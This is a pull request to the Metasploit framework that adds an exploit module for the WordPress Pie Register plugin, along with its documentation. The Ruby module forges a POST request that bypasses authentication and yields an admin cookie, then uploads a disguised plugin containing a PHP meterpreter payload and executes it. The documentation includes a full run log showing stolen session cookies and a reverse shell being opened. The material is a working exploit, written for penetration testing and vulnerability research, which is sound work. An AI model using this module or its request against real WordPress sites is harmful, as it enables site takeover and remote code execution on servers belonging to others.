### PR TITLE
pie-register on wordpress auth-bypass to RCE

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -21,6 +21,7 @@ slideshow-gallery
 reflex-gallery
 wp-symposium
 photo-gallery
+pie-register
 wysija-newsletters
 all-in-one-wp-migration
 wp-ultimate-csv-importer

--- a/documentation/modules/exploit/unix/webapp/wp_pie_register_bypass_rce.md
+++ b/documentation/modules/exploit/unix/webapp/wp_pie_register_bypass_rce.md
@@ -1,0 +1,74 @@
+## Vulnerable Application
+
+Download [pie-register.3.7.1.4.zip](https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip).
+Install it, and activiate it.  No additional configuration is required.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/unix/webapp/wp_pie_register_bypass_rce`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### USERID
+
+The `USERID` of a valid user that should have a cookie generated for.  Should be an admin user.  Defaults to `1`.
+
+## Scenarios
+
+### Wordpress 5.4.4 with Pie Register 3.7.1.4
+
+```
+[*] Processing pie_register.rb for ERB directives.
+resource (pie_register.rb)> use wp_pie_register_bypass_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/unix/webapp/wp_pie_register_bypass_rce  2021-10-08       excellent  Yes    WordPress Plugin Pie Register Auth Bypass to RCE
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_pie_register_bypass_rce
+
+[*] Using exploit/unix/webapp/wp_pie_register_bypass_rce
+resource (pie_register.rb)> set rhosts 192.168.2.144
+rhosts => 192.168.2.144
+resource (pie_register.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (pie_register.rb)> set verbose true
+verbose => true
+resource (pie_register.rb)> run
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/pie-register/readme.txt
+[*] Found version 3.7.1.4 in the plugin
+[+] The target appears to be vulnerable.
+[*] Bypassing Authentiation
+[*] Found cookie: wordpress_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7Cac034a6841edfa4d49e5ab75cb37b69f52a8a92bcf9ad335bd4ad77d287b5349
+[*] Found cookie: wordpress_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7Cac034a6841edfa4d49e5ab75cb37b69f52a8a92bcf9ad335bd4ad77d287b5349
+[*] Found cookie: wordpress_logged_in_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7C3f79f2326314d81da1e4fd4dd8b29a30a1666c8b6378ca719377cf0fd4e6dfff
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Acquired a plugin upload nonce: 04f6142d66
+[*] Uploaded plugin iQujVpTJNo
+[*] Executing the payload at /wp-content/plugins/iQujVpTJNo/pZtgbKCrHr.php...
+[*] Sending stage (39282 bytes) to 192.168.2.144
+[+] Deleted pZtgbKCrHr.php
+[+] Deleted iQujVpTJNo.php
+[+] Deleted ../iQujVpTJNo
+[*] Meterpreter session 1 opened (192.168.2.199:4444 -> 192.168.2.144:51748 ) at 2021-10-11 15:16:27 -0400
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : wordpress2004
+OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
+Meterpreter : php/linux
+```

--- a/documentation/modules/exploit/unix/webapp/wp_pie_register_bypass_rce.md
+++ b/documentation/modules/exploit/unix/webapp/wp_pie_register_bypass_rce.md
@@ -38,14 +38,14 @@ Matching Modules
 Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_pie_register_bypass_rce
 
 [*] Using exploit/unix/webapp/wp_pie_register_bypass_rce
-resource (pie_register.rb)> set rhosts 192.168.2.144
-rhosts => 192.168.2.144
-resource (pie_register.rb)> set lhost 192.168.2.199
-lhost => 192.168.2.199
+resource (pie_register.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (pie_register.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
 resource (pie_register.rb)> set verbose true
 verbose => true
 resource (pie_register.rb)> run
-[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] Started reverse TCP handler on 2.2.2.2:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking /wp-content/plugins/pie-register/readme.txt
 [*] Found version 3.7.1.4 in the plugin
@@ -59,11 +59,11 @@ resource (pie_register.rb)> run
 [*] Acquired a plugin upload nonce: 04f6142d66
 [*] Uploaded plugin iQujVpTJNo
 [*] Executing the payload at /wp-content/plugins/iQujVpTJNo/pZtgbKCrHr.php...
-[*] Sending stage (39282 bytes) to 192.168.2.144
+[*] Sending stage (39282 bytes) to 1.1.1.1
 [+] Deleted pZtgbKCrHr.php
 [+] Deleted iQujVpTJNo.php
 [+] Deleted ../iQujVpTJNo
-[*] Meterpreter session 1 opened (192.168.2.199:4444 -> 192.168.2.144:51748 ) at 2021-10-11 15:16:27 -0400
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:51748 ) at 2021-10-11 15:16:27 -0400
 
 meterpreter > getuid
 Server username: www-data

--- a/documentation/modules/exploit/unix/webapp/wp_pie_register_bypass_rce.md
+++ b/documentation/modules/exploit/unix/webapp/wp_pie_register_bypass_rce.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 Download [pie-register.3.7.1.4.zip](https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip).
-Install it, and activiate it.  No additional configuration is required.
+Install and activate it.  No additional configuration is required.
 
 ## Verification Steps
 
@@ -16,14 +16,13 @@ Install it, and activiate it.  No additional configuration is required.
 
 ### USERID
 
-The `USERID` of a valid user that should have a cookie generated for.  Should be an admin user.  Defaults to `1`.
+The `USERID` of a valid user to generate a cookie for.  Should be an admin user.  Defaults to `1`.
 
 ## Scenarios
 
 ### Wordpress 5.4.4 with Pie Register 3.7.1.4
 
 ```
-[*] Processing pie_register.rb for ERB directives.
 resource (pie_register.rb)> use wp_pie_register_bypass_rce
 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
 

--- a/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb
+++ b/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cookie_jar.clear # prevent issues between attempts
-    print_status('Bypassing Authentiation')
+    print_status('Bypassing Authentication')
     cookie = get_cookie
 
     print_status('Preparing payload...')

--- a/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb
+++ b/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Plugin Pie Register Auth Bypass to RCE',
+        'Description' => %q{
+          This module uses an authentication bypass vulnerability in
+          Wordpress Plugin Pie Register <= 3.7.1.4 to generate a valid cookie.
+          With this cookie, hopefully of the admin, it will generate a plugin,
+          pack the payload into it and upload it to a server running WordPress.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # Metasploit module
+          'Lotfi13-DZ' # EDB
+        ],
+        'DisclosureDate' => '2021-10-08',
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['WordPress', {}]],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['EDB', '50395']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptInt.new('USERID', [true, 'User ID to take over', 1]),
+      ]
+    )
+  end
+
+  def check
+    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?
+
+    checkcode = check_plugin_version_from_readme('pie-register', '3.7.1.5')
+    if checkcode == CheckCode::Safe
+      print_error('Pie Register not a vulnerable version')
+    end
+    return checkcode
+  end
+
+  def get_cookie
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path),
+      'vars_post' => {
+        'user_id_social_site' => datastore['USERID'],
+        'social_site' => 'true',
+        'piereg_login_after_registration' => 'true',
+        '_wp_http_referer' => '/login/',
+        'log' => 'null',
+        'pwd' => 'null'
+      },
+      'keep_cookies' => 'true'
+    })
+    fail_with(Failure::Unreachable, 'Site not responding') unless res
+
+    cookie_jar.cookies.each do |c|
+      print_status("Found cookie: #{c.name}=#{c.value}")
+    end
+    res.get_cookies
+  end
+
+  # direct copy from modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+  def generate_plugin(plugin_name, payload_name)
+    plugin_script = %(<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
+ * Author: #{Rex::Text.rand_text_alpha(10)}
+ * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * License: GPL2
+ */
+?>)
+
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
+    zip
+  end
+
+  def exploit
+    cookie_jar.clear # prevent issues between attempts
+    print_status('Bypassing Authentiation')
+    cookie = get_cookie
+
+    print_status('Preparing payload...')
+    plugin_name = Rex::Text.rand_text_alpha(10)
+    payload_name = Rex::Text.rand_text_alpha(10).to_s
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status('Uploading payload...')
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("Executing the payload at #{payload_uri}...")
+    register_files_for_cleanup("#{payload_name}.php")
+    register_files_for_cleanup("#{plugin_name}.php")
+    register_dir_for_cleanup("../#{plugin_name}")
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+  end
+end


### PR DESCRIPTION
This PR adds a new module which exploits pie-register for RCE.

pie-register is a wordpress plugin which contains an auth bypass via 1 POST request.  Boom, you now have an admin cookie, now follow `wp_admin_shell_upload` to get RCE via plugin.

## Verification

- [ ] install plugin
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/wp_pie_register_bypass_rce`
- [ ] `set rhosts/lhosts/USERID`
- [ ] `exploit`
- [ ] **Verify** you get a shell
- [ ] **Document** looks good